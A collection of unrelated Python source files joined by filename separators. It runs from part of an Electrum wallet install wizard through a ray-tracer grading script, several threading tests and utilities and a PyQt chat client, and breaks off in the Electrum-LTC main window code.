msg = _('Your accounts have been moved to') + ':\n' + file_list + '\n\n'+ _('Do you want to delete the old file') + ':\n' + path
if self.question(msg):
os.remove(path)
self.show_warning(_('The file was removed'))
return
if self.storage.requires_upgrade():
self.storage.upgrade()
self.wallet = Wallet(self.storage)
return self.wallet
action = self.storage.get_action()
if action and action != 'new':
self.hide()
msg = _("The file '{}' contains an incompletely created wallet.\n"
"Do you want to complete its creation now?").format(path)
if not self.question(msg):
if self.question(_("Do you want to delete '{}'?").format(path)):
os.remove(path)
self.show_warning(_('The file was removed'))
return
self.show()
if action:
# self.wallet is set in run
self.run(action)
return self.wallet
self.wallet = Wallet(self.storage)
return self.wallet
def finished(self):
"""Called in hardware client wrapper, in order to close popups."""
return
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
traceback.print_exception(*exc_info)
self.show_error(str(exc_info[1]))
def set_icon(self, filename):
prior_filename, self.icon_filename = self.icon_filename, filename
self.logo.setPixmap(QPixmap(filename))
return prior_filename
def set_layout(self, layout, title=None, next_enabled=True):
self.title.setText("<b>%s</b>"%title if title else "")
self.title.setVisible(bool(title))
# Get rid of any prior layout by assigning it to a temporary widget
prior_layout = self.main_widget.layout()
if prior_layout:
QWidget().setLayout(prior_layout)
self.main_widget.setLayout(layout)
self.back_button.setEnabled(True)
self.next_button.setEnabled(next_enabled)
if next_enabled:
self.next_button.setFocus()
self.main_widget.setVisible(True)
self.please_wait.setVisible(False)
def exec_layout(self, layout, title=None, raise_on_cancel=True,
next_enabled=True):
self.set_layout(layout, title, next_enabled)
result = self.loop.exec_()
if not result and raise_on_cancel:
raise UserCancelled
if result == 1:
raise GoBack from None
self.title.setVisible(False)
self.back_button.setEnabled(False)
self.next_button.setEnabled(False)
self.main_widget.setVisible(False)
self.please_wait.setVisible(True)
self.refresh_gui()
return result
def refresh_gui(self):
# For some reason, to refresh the GUI this needs to be called twice
self.app.processEvents()
self.app.processEvents()
def remove_from_recently_open(self, filename):
self.config.remove_from_recently_open(filename)
def text_input(self, title, message, is_valid, allow_multi=False):
slayout = KeysLayout(parent=self, title=message, is_valid=is_valid,
allow_multi=allow_multi)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_text()
def seed_input(self, title, message, is_seed, options):
slayout = SeedLayout(title=message, is_seed=is_seed, options=options, parent=self)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_seed(), slayout.is_bip39, slayout.is_ext
@wizard_dialog
def add_xpub_dialog(self, title, message, is_valid, run_next, allow_multi=False):
return self.text_input(title, message, is_valid, allow_multi)
@wizard_dialog
def add_cosigner_dialog(self, run_next, index, is_valid):
title = _("Add Cosigner") + " %d"%index
message = ' '.join([
_('Please enter the master public key (xpub) of your cosigner.'),
_('Enter their master private key (xprv) if you want to be able to sign for them.')
])
return self.text_input(title, message, is_valid)
@wizard_dialog
def restore_seed_dialog(self, run_next, test):
options = []
if self.opt_ext:
options.append('ext')
if self.opt_bip39:
options.append('bip39')
title = _('Enter Seed')
message = _('Please enter your seed phrase in order to restore your wallet.')
return self.seed_input(title, message, test, options)
@wizard_dialog
def confirm_seed_dialog(self, run_next, test):
self.app.clipboard().clear()
title = _('Confirm Seed')
message = ' '.join([
_('Your seed is important!'),
_('If you lose your seed, your money will be permanently lost.'),
_('To make sure that you have properly saved your seed, please retype it here.')
])
seed, is_bip39, is_ext = self.seed_input(title, message, test, None)
return seed
@wizard_dialog
def show_seed_dialog(self, run_next, seed_text):
title = _("Your wallet generation seed is:")
slayout = SeedLayout(seed=seed_text, title=title, msg=True, options=['ext'])
self.exec_layout(slayout)
return slayout.is_ext
def pw_layout(self, msg, kind, force_disable_encrypt_cb):
playout = PasswordLayout(None, msg, kind, self.next_button,
force_disable_encrypt_cb=force_disable_encrypt_cb)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.new_password(), playout.encrypt_cb.isChecked()
@wizard_dialog
def request_password(self, run_next, force_disable_encrypt_cb=False):
"""Request the user enter a new password and confirm it. Return
the password or None for no password."""
return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW, force_disable_encrypt_cb)
@wizard_dialog
def request_storage_encryption(self, run_next):
playout = PasswordLayoutForHW(None, MSG_HW_STORAGE_ENCRYPTION, PW_NEW, self.next_button)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.encrypt_cb.isChecked()
def show_restore(self, wallet, network):
# FIXME: these messages are shown after the install wizard is
# finished and the window closed. On macOS they appear parented
# with a re-appeared ghost install wizard window...
if network:
def task():
wallet.wait_until_synchronized()
if wallet.is_found():
msg = _("Recovery successful")
else:
msg = _("No transactions found for this seed")
self.synchronized_signal.emit(msg)
self.synchronized_signal.connect(self.show_message)
t = threading.Thread(target = task)
t.daemon = True
t.start()
else:
msg = _("This wallet was restored offline. It may "
"contain more addresses than displayed.")
self.show_message(msg)
@wizard_dialog
def confirm_dialog(self, title, message, run_next):
self.confirm(message, title)
def confirm(self, message, title):
label = WWLabel(message)
vbox = QVBoxLayout()
vbox.addWidget(label)
self.exec_layout(vbox, title)
@wizard_dialog
def action_dialog(self, action, run_next):
self.run(action)
def terminate(self):
self.accept_signal.emit()
def waiting_dialog(self, task, msg):
self.please_wait.setText(msg)
self.refresh_gui()
t = threading.Thread(target = task)
t.start()
t.join()
@wizard_dialog
def choice_dialog(self, title, message, choices, run_next):
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
clayout = ChoicesLayout(message, c_titles)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, title)
action = c_values[clayout.selected_index()]
return action
def query_choice(self, msg, choices):
"""called by hardware wallets"""
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, '')
return clayout.selected_index()
@wizard_dialog
def line_dialog(self, run_next, title, message, default, test, warning='',
presets=()):
vbox = QVBoxLayout()
vbox.addWidget(WWLabel(message))
line = QLineEdit()
line.setText(default)
def f(text):
self.next_button.setEnabled(test(text))
line.textEdited.connect(f)
vbox.addWidget(line)
vbox.addWidget(WWLabel(warning))
for preset in presets:
button = QPushButton(preset[0])
button.clicked.connect(lambda __, text=preset[1]: line.setText(text))
button.setMaximumWidth(150)
hbox = QHBoxLayout()
hbox.addWidget(button, Qt.AlignCenter)
vbox.addLayout(hbox)
self.exec_layout(vbox, title, next_enabled=test(default))
return ' '.join(line.text().split())
@wizard_dialog
def show_xpub_dialog(self, xpub, run_next):
msg = ' '.join([
_("Here is your master public key."),
_("Please share it with your cosigners.")
])
vbox = QVBoxLayout()
layout = SeedLayout(xpub, title=msg, icon=False)
vbox.addLayout(layout.layout())
self.exec_layout(vbox, _('Master Public Key'))
return None
def init_network(self, network):
message = _("ElectrumG communicates with remote servers to get "
"information about your transactions and addresses. The "
"servers all fulfill the same purpose only differing in "
"hardware. In most cases you simply want to let Electrum "
"pick one at random. However if you prefer feel free to "
"select a server manually.")
choices = [_("Auto connect"), _("Select server manually")]
title = _("How do you want to connect to a server? ")
clayout = ChoicesLayout(message, choices)
self.back_button.setText(_('Cancel'))
self.exec_layout(clayout.layout(), title)
r = clayout.selected_index()
if r == 1:
nlayout = NetworkChoiceLayout(network, self.config, wizard=True)
if self.exec_layout(nlayout.layout()):
nlayout.accept()
else:
network.auto_connect = True
self.config.set_key('auto_connect', True, True)
@wizard_dialog
def multisig_dialog(self, run_next):
cw = CosignWidget(2, 2)
m_edit = QSlider(Qt.Horizontal, self)
n_edit = QSlider(Qt.Horizontal, self)
n_edit.setMinimum(2)
n_edit.setMaximum(15)
m_edit.setMinimum(1)
m_edit.setMaximum(2)
n_edit.setValue(2)
m_edit.setValue(2)
n_label = QLabel()
m_label = QLabel()
grid = QGridLayout()
grid.addWidget(n_label, 0, 0)
grid.addWidget(n_edit, 0, 1)
grid.addWidget(m_label, 1, 0)
grid.addWidget(m_edit, 1, 1)
def on_m(m):
m_label.setText(_('Require {0} signatures').format(m))
cw.set_m(m)
def on_n(n):
n_label.setText(_('From {0} cosigners').format(n))
cw.set_n(n)
m_edit.setMaximum(n)
n_edit.valueChanged.connect(on_n)
m_edit.valueChanged.connect(on_m)
on_n(2)
on_m(2)
vbox = QVBoxLayout()
vbox.addWidget(cw)
vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock funds in your wallet:")))
vbox.addLayout(grid)
self.exec_layout(vbox, _("Multi-Signature Wallet"))
m = int(m_edit.value())
n = int(n_edit.value())
return (m, n)
|
grading-script.py
|
#!/usr/bin/python
# ./grading-script.py <test-dir>
import os,re,sys,shutil,random,subprocess,threading
test_dir = 'tests'
if len(sys.argv) > 1:
test_dir=sys.argv[1]
# Set up scratch space for grading
dir="grading"
try:
shutil.rmtree(dir)
except:
pass
os.mkdir(dir)
os.mkdir(dir + '/src')
re_cp=re.compile('\.h$|\.cpp$|^Makefile$')
for f in os.listdir('.'):
if re_cp.search(f):
shutil.copyfile(f, dir+"/"+f)
for f in os.listdir('src'):
if re_cp.search(f):
shutil.copyfile('src/' + f, dir+"/src/"+f)
# Check for cheating
token='TOKEN'+str(random.randrange(100000,999999))
header_cmd=['g++','-Wall','-g','-O3','-std=c++11','-M' ,'-DNO_OPENGL']
re_header=re.compile('[\\\\ :\n]+')
ok_h={'':1}
header_base=subprocess.check_output(header_cmd+['src/header-check.cpp']);
for h in re_header.split(header_base):
ok_h[h]=1
for src_file in [
'camera',
'dump_png',
'flat_shader',
'main',
'parse',
'phong_shader',
'plane',
'reflective_shader',
'render_world',
'sphere']:
ok_h['src/' + src_file + '.cpp']=1
ok_h[src_file + '.o']=1
header_mini=subprocess.check_output(header_cmd+['src/' + src_file + '.cpp']);
for h in re_header.split(header_mini):
if not ok_h.has_key(h):
print("FAIL: forbidden include: "+h)
exit()
if subprocess.call(['make','ray_tracer'],cwd=dir)!=0:
print("FAIL: Did not compile")
exit()
def run_command_with_timeout(cmd, timeout_sec):
proc = subprocess.Popen(cmd,cwd=dir)
proc_thread = threading.Thread(target=proc.communicate)
proc_thread.start()
proc_thread.join(timeout_sec)
if proc_thread.is_alive():
try:
proc.kill()
except OSError, e:
return True
return False
return True
hashed_tests={}
total_score=0
ignore_line=re.compile('^\s*(#|$)')
grade_line=re.compile('^(\S+)\s+(\S+)\s+(\S+)\s*$')
gs=0
try:
gs=open('grading-scheme.txt')
except:
print("FAIL: could not open grading scheme.")
exit()
diff_parse=re.compile('diff: (.*)')
time_parse=re.compile('time: (.*)')
grade_cmd=['./ray_tracer', '-i', 'file.txt', '-s', 'file.png', '-o', token+'.txt']
for line in gs.readlines():
if ignore_line.search(line):
continue
g=grade_line.search(line)
if not g:
print("Unrecognized command: "+line)
exit()
points=float(g.groups()[0])
max_error=float(g.groups()[1])
max_time=15000
file=g.groups()[2]
pass_error = 0
pass_time = 0
if not hashed_tests.has_key(file):
timeout = max(int(max_time*1.2*3/1000)+1,2)
shutil.copyfile(test_dir+'/'+file+".txt", dir+"/file.txt")
shutil.copyfile(test_dir+'/'+file+".png", dir+"/file.png")
if not run_command_with_timeout(grade_cmd, timeout):
hashed_tests[file]="TIMEOUT"
else:
d=False
try:
results_file=open(dir+'/'+token+'.txt')
d=diff_parse.match(results_file.readline())
results_file.close()
os.remove(dir+'/'+token+'.txt')
if d: d=float(d.groups()[0])
except IOError:
# print 'Test failed'
d="CRASH"
hashed_tests[file]=d
d=hashed_tests[file]
if d=="CRASH":
print("FAIL: (%s) Program crashed."%file)
points=0
elif d=="TIMEOUT":
print("FAIL: (%s) Test timed out."%file)
points=0
elif d==None:
print("FAIL: (%s) Program failed to report statistics."%file)
points=0
else:
if d>max_error:
print("FAIL: (%s) Too much error. Actual: %g Max: %g."%(file,d,max_error))
points=0
else:
print("PASS: (%s) diff %g vs %g."%(file,d,max_error))
if points>0:
print("+%g points"%points)
total_score+=points
else:
print("no points")
print("FINAL SCORE: %g"%total_score)
|
test_timeoutqueue.py
|
# Copyright (c) 2001-2004 Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Test cases for timeoutqueue module.
"""
import time
from twisted.trial import unittest
from twisted.python import timeoutqueue
from twisted.internet import reactor, interfaces
class TimeoutQueueTest(unittest.TestCase):
def setUp(self):
self.q = timeoutqueue.TimeoutQueue()
def tearDown(self):
del self.q
def put(self):
time.sleep(1)
self.q.put(1)
def testTimeout(self):
q = self.q
try:
q.wait(1)
except timeoutqueue.TimedOut:
pass
else:
raise AssertionError, "didn't time out"
def testGet(self):
q = self.q
start = time.time()
threading.Thread(target=self.put).start()
q.wait(1.5)
assert time.time() - start < 2
result = q.get(0)
if result != 1:
raise AssertionError, "didn't get item we put in"
if interfaces.IReactorThreads(reactor, None) is None:
testGet.skip = "No thread support, no way to test putting during a blocked get"
else:
global threading
import threading
|
py_chat.py
|
# -*- coding: utf-8 -*-
""" py_chat.py - Main class for a simple chat program"""
__author__ = "topseli"
__credits__ = ["Deepak Sritvatsav"]
__license__ = "0BSD"
import sys
import os
import socket
import threading
import base64
import logging
from PyQt5 import QtWidgets, uic
import login_view
import chat_view
class PyChat(QtWidgets.QWidget):
def __init__(self):
super(PyChat, self).__init__()
self.init_ui()
self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.thread = threading.Thread(target=self.server_listener, args=(1,), daemon=True)
logging.basicConfig(format='%(levelname)s:%(message)s', level=logging.DEBUG)
def init_ui(self):
path = os.path.dirname(os.path.abspath(__file__)) + '/main_window.ui'
uic.loadUi(path, self)
# Create QWidget instances
self.login_widget = login_view.LoginView()
self.chat_widget = chat_view.ChatView()
# Add QWidget instances to stackedWidget
self.stacked_widget.addWidget(self.login_widget)
self.stacked_widget.addWidget(self.chat_widget)
# Connect exit_buttons
self.login_widget.exit_button.clicked.connect(
self.on_exit_button_clicked)
self.chat_widget.exit_button.clicked.connect(
self.on_exit_button_clicked)
# Connect signals
self.login_widget.login_signal.connect(
self.on_login_clicked)
self.chat_widget.send_signal.connect(
self.on_send_clicked)
def to_base64(self, message):
return base64.encodebytes(message.encode("utf-8"))
def rcv_base64(self, message):
return base64.decodebytes(message).decode("utf-8")
def server_listener(self, id):
while True:
message = self.rcv_base64(self.server.recv(2048))
if message:
self.chat_widget.chat_display.append(message)
def start_chat_thread(self):
self.thread.start()
def on_exit_button_clicked(self):
sys.exit(0)
def on_login_clicked(self, login_info):
try:
self.server.connect((login_info["address"], login_info["port"]))
self.server.sendall(self.to_base64(login_info["username"]))
except ConnectionRefusedError as e:
self.login_widget.show_warning(e)
return
self.stacked_widget.setCurrentWidget(self.chat_widget)
self.start_chat_thread()
def on_send_clicked(self, message):
self.server.sendall(self.to_base64(message))
def run():
APP = QtWidgets.QApplication(sys.argv)
APP_WINDOW = PyChat()
APP_WINDOW.show()
APP.exec_()
if __name__ == '__main__':
run()
|
test_lockable.py
|
#!/usr/bin/env python
__author__ = "Radical.Utils Development Team (Andre Merzky)"
__copyright__ = "Copyright 2013, RADICAL@Rutgers"
__license__ = "MIT"
import time
import threading as mt
import radical.utils as ru
# ------------------------------------------------------------------------------
#
def test_lockable():
'''
Test lockable decorator
'''
# --------------------------------------------------------------------------
@ru.Lockable
class Test(object):
# ----------------------------------------------------------------------
def __init__(self):
self.val = False
# ----------------------------------------------------------------------
def test(self):
self.lock() # lock before spawning thread
thread_1 = mt.Thread(target=self.test_1)
thread_1.start() # thread will run until lock check
time.sleep(0.1) # enough time to trigger lock violation
self.val = False # set a bogus value
self.unlock() # only now thread can set True
thread_1.join() # make sure the value was set
assert(self.val) # make sure the value was set correctly
self.lock() # lock before spawning thread
thread_2 = mt.Thread(target=self.test_2)
thread_2.start() # thread will run until lock check
time.sleep(0.1) # enough time to trigger lock violation
self.val = False # set a bogus value
self.unlock() # only now thread can set True
thread_2.join() # make sure the value was set
assert(self.val) # make sure the value was set correctly
# ----------------------------------------------------------------------
def test_1(self):
with self:
self.val = True
# ----------------------------------------------------------------------
def test_2(self):
self.lock()
self.val = True
self.unlock()
# --------------------------------------------------------------------------
t = Test()
# check lock with resource manager
with t:
pass
# check explicit and recursive lock/unlock
t.lock (); assert( t.locked()) # noqa
t.unlock(); assert(not t.locked()) # noqa
t.lock (); assert( t.locked()) # noqa
t.lock (); assert( t.locked()) # noqa
t.unlock(); assert( t.locked()) # noqa
t.unlock(); assert(not t.locked()) # noqa
# check locking over threads
t.test()
# check double unlock
try : t.unlock(); assert(not t.locked()) # noqa
except RuntimeError : pass
except Exception as e: assert(False), "RuntimeError != %s" % type(e)
else : assert(False), "expected RuntimeError, got none"
# ------------------------------------------------------------------------------
# run tests if called directly
if __name__ == "__main__":
test_lockable()
# ------------------------------------------------------------------------------
|
utils.py
|
#!/usr/bin/env python3
###############################################################################
# Module Imports
###############################################################################
import logging
import re
import time
import threading
import signal
import functools
import inspect
###############################################################################
# Decorators
###############################################################################
###############################################################################
# Decorator decorator is a simplified version of the code from the funcy lib.
# https://github.com/Suor/funcy
###############################################################################
class Call:
def __init__(self, func, args, kwargs):
self.func, self.args, self.kwargs = func, args, kwargs
def __call__(self):
return self.func(*self.args, **self.kwargs)
def decorator(deco):
spec = inspect.getargspec(deco)
if len(spec.args) > 1 or spec.varargs or spec.keywords:
@functools.wraps(deco)
def _fab(*dargs, **dkwargs):
return make_decorator(deco, *dargs, **dkwargs)
return _fab
else:
return functools.wraps(deco)(make_decorator(deco))
def make_decorator(deco, *dargs, **dkwargs):
def _decorator(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
call = Call(func, args, kwargs)
return deco(call, *dargs, **dkwargs)
return wrapper
return _decorator
###############################################################################
@decorator
def listify(call, wrapper=list):
return wrapper(call())
@decorator
def morph(call, catch_exc, raise_exc):
try:
return call()
except catch_exc as error:
raise raise_exc(error) from error
@decorator
def ignore(call, error=Exception, value=None):
try:
return call()
except error:
return value
@decorator
def log_errors(call, logger=print):
try:
return call()
except Exception as error:
logger(error)
raise (error)
@decorator
def decochain(call, *decs):
fn = call.func
for dec in reversed(decs):
fn = dec(fn)
return fn(*call.args, **call.kwargs)
class cached_property:
def __init__(self, func):
self.func = func
functools.update_wrapper(self, func)
def __get__(self, obj, cls):
if not hasattr(obj, "_cache"):
obj._cache = {}
if self.func.__name__ not in obj._cache:
obj._cache[self.func.__name__] = self.func(obj)
return obj._cache[self.func.__name__]
###############################################################################
def split(text, delimeters):
pattern = "|".join(map(re.escape, delimeters))
return re.split(pattern, text)
class ProgressBar:
def __init__(self, title, max_value):
self.title = title
self.max_value = max_value
self.value = 0
signal.signal(signal.SIGINT, self.exit)
def start(self):
self.finished = False
self.time_started = time.time()
threading.Thread(target=self.run).start()
def update(self):
print(self.line() + "\r", end="")
def line(self):
filled = 40 * self.value / self.max_value
parts = " ▏▎▍▌▋▊▉"
current = int(filled * len(parts)) % len(parts)
bar = "█" * int(filled) + parts[current] + " " * 40
tm = time.gmtime(time.time() - self.time_started)
return "{} |{}| {:>3}% ({}:{:02}:{:02}) ".format(
self.title,
bar[:40],
100 * self.value // self.max_value,
tm.tm_hour,
tm.tm_min,
tm.tm_sec,
)
def run(self):
while not self.finished:
self.update()
time.sleep(1)
def stop(self):
self.finished = True
print(self.line())
def exit(self, signum, frame):
self.stop()
raise KeyboardInterrupt
def pbar(it, title=None, max=None):
max = len(it) if max is None else max
title = "" if title is None else title + " "
bar = ProgressBar(title, max)
bar.start()
for i in it:
yield i
bar.value += 1
bar.update()
bar.stop()
###############################################################################
class LogCount:
def __init__(self):
self.count = 1
def filter(self, record):
record.count = self.count
self.count += 1
return True
def log_sql_debug():
logger = logging.getLogger("peewee")
logger.setLevel(logging.DEBUG)
logger.addFilter(LogCount())
term = logging.StreamHandler()
term.setFormatter(logging.Formatter("{count} {message}", style="{"))
logger.addHandler(term)
def default_logging(debug=False):
term = logging.StreamHandler()
file = logging.FileHandler("pyscp.log", mode="a", delay=True)
if debug:
term.setLevel(logging.DEBUG)
file.setLevel(logging.DEBUG)
else:
term.setLevel(logging.INFO)
file.setLevel(logging.INFO)
term.setFormatter(logging.Formatter("{message}", style="{"))
file.setFormatter(
logging.Formatter("{asctime} {levelname:8s} {message}", style="{")
)
logger = logging.getLogger("pyscp")
logger.setLevel(logging.DEBUG)
logger.addHandler(term)
logger.addHandler(file)
###############################################################################
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from typing import Optional, TYPE_CHECKING, Sequence, List, Union
from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor, QFont
from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
QMenuBar, QFileDialog, QCheckBox, QLabel,
QVBoxLayout, QGridLayout, QLineEdit,
QHBoxLayout, QPushButton, QScrollArea, QTextEdit,
QShortcut, QMainWindow, QCompleter, QInputDialog,
QWidget, QSizePolicy, QStatusBar, QToolTip, QDialog)
import electrum_ltc as electrum
from electrum_ltc import (keystore, ecc, constants, util, bitcoin, commands,
paymentrequest)
from electrum_ltc.bitcoin import COIN, is_address
from electrum_ltc.plugin import run_hook
from electrum_ltc.i18n import _
from electrum_ltc.util import (format_time, format_satoshis, format_fee_satoshis,
format_satoshis_plain,
UserCancelled, profiler,
export_meta, import_meta, bh2u, bfh, InvalidPassword,
decimal_point_to_base_unit_name,
UnknownBaseUnit, DECIMAL_POINT_DEFAULT, UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter,
InvalidBitcoinURI, maybe_extract_bolt11_invoice, NotEnoughFunds,
NoDynamicFeeEstimates, MultipleSpendMaxTxOutputs)
from electrum_ltc.util import PR_TYPE_ONCHAIN, PR_TYPE_LN, PR_DEFAULT_EXPIRATION_WHEN_CREATING
from electrum_ltc.transaction import (Transaction, PartialTxInput,
PartialTransaction, PartialTxOutput)
from electrum_ltc.address_synchronizer import AddTransactionException
from electrum_ltc.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption)
from electrum_ltc.version import ELECTRUM_VERSION
from electrum_ltc.network import Network, TxBroadcastError, BestEffortRequestFailed, UntrustedServerReturnedError
from electrum_ltc.exchange_rate import FxThread
from electrum_ltc.simple_config import SimpleConfig
from electrum_ltc.logging import Logger
from electrum_ltc.util import PR_PAID, PR_FAILED
from electrum_ltc.util import pr_expiration_values
from electrum_ltc.lnutil import ln_dummy_address
from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, FreezableLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog,
WindowModalDialog, ChoicesLayout, HelpLabel, Buttons,
OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
CloseButton, HelpButton, MessageBoxMixin, EnterButton,
import_meta_gui, export_meta_gui,
filename_field, address_field, char_width_in_lineedit, webopen,
TRANSACTION_FILE_EXTENSION_FILTER_ANY, MONOSPACE_FONT)
from .util import ButtonsTextEdit
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
from .update_checker import UpdateCheck, UpdateCheckThread
from .channels_list import ChannelsList
from .confirm_tx_dialog import ConfirmTxDialog
from .transaction_dialog import PreviewTxDialog
if TYPE_CHECKING:
from . import ElectrumGui
LN_NUM_PAYMENT_ATTEMPTS = 10
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
self.setCursor(QCursor(Qt.PointingHandCursor))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == Qt.Key_Return:
self.func()
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
#ln_payment_attempt_signal = pyqtSignal(str)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
def __init__(self, gui_object: 'ElectrumGui', wallet: Abstract_Wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config # type: SimpleConfig
self.gui_thread = gui_object.gui_thread
self.setup_exception_hook()
self.network = gui_object.daemon.network # type: Network
assert wallet, "no wallet"
self.wallet = wallet
self.fx = gui_object.daemon.fx # type: FxThread
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.payment_request = None # type: Optional[paymentrequest.PaymentRequest]
self.payto_URI = None
self.checking_accounts = False
self.qr_window = None
self.pluginsdialog = None
self.tl_windows = []
Logger.__init__(self)
self.tx_notification_queue = queue.Queue()
self.tx_notification_last_time = 0
self.create_status_bar()
self.need_update = threading.Event()
self.decimal_point = config.get('decimal_point', DECIMAL_POINT_DEFAULT)
try:
decimal_point_to_base_unit_name(self.decimal_point)
except UnknownBaseUnit:
self.decimal_point = DECIMAL_POINT_DEFAULT
self.num_zeros = int(config.get('num_zeros', 0))
self.completions = QStringListModel()
coincontrol_sb = self.create_coincontrol_statusbar()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
self.channels_tab = self.create_channels_tab()
tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
if self.wallet.has_lightning():
add_optional_tab(tabs, self.channels_tab, read_QIcon("lightning.png"), _("Channels"), "channels")
add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
central_widget = QWidget()
vbox = QVBoxLayout(central_widget)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.addWidget(tabs)
vbox.addWidget(coincontrol_sb)
self.setCentralWidget(central_widget)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(read_QIcon("electrum-ltc.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("F5"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'new_transaction', 'status',
